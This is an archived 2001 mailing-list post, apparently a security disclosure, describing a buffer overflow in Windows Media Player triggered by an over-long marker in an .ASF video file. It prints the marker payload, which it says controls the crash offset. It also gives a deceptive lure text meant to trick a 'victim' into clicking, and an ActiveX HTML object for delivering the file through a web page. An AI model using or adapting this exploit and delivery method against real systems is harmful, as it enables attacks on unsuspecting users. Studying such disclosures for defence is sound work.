I dunno if I've sent this before.
If you embed a marker long enough in an .ASF video file
you can make WMP crash when a victim clicks the
marker drop down list under the file during playback.
Use ASFCHOP.EXE to embed the following script to any
ASF file:
----8<----cut-here-----8<----
start_marker_table
0.0
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCC
0.1 Click here to bypass the advertisements!
end_marker_table
----8<----cut-here-----8<----
As you can see, I used a catch to persuade the victim
to click the bar. When a victim clicks on the bar,
WMP crashes at offset 43434343 ("CCCC").
With WMP7 you have to use an ActiveX object on a HTML
page to launch the old buggy WMP module. Make sure you
set marker bar visible in the parameters. I guess it's
the parameter "ShowGotoBar"
Dummy example:
<OBJECT classid=CLSID:22d6f312-b0f6-11d0-94ab-0080c74c7e95 id=DSPlay1
name=DSPlay1
type="application/x-oleobject">
<PARAM NAME="ShowControls" VALUE="-1">
<PARAM NAME="ShowGotoBar" VALUE="1">
<PARAM NAME="ShowStatusBar" VALUE="1">
<PARAM NAME="ControlType" VALUE="2">
<PARAM NAME="Filename" VALUE="a.asf">
<PARAM NAME="InvokeURLs" VALUE="-1">
</OBJECT>
_________________________________________________________________
Get your FREE download of MSN Explorer at http://explorer.msn.com/intl.asp
This archive was generated by hypermail 2b30 : Tue Aug 07 2001 - 12:08:18 PDT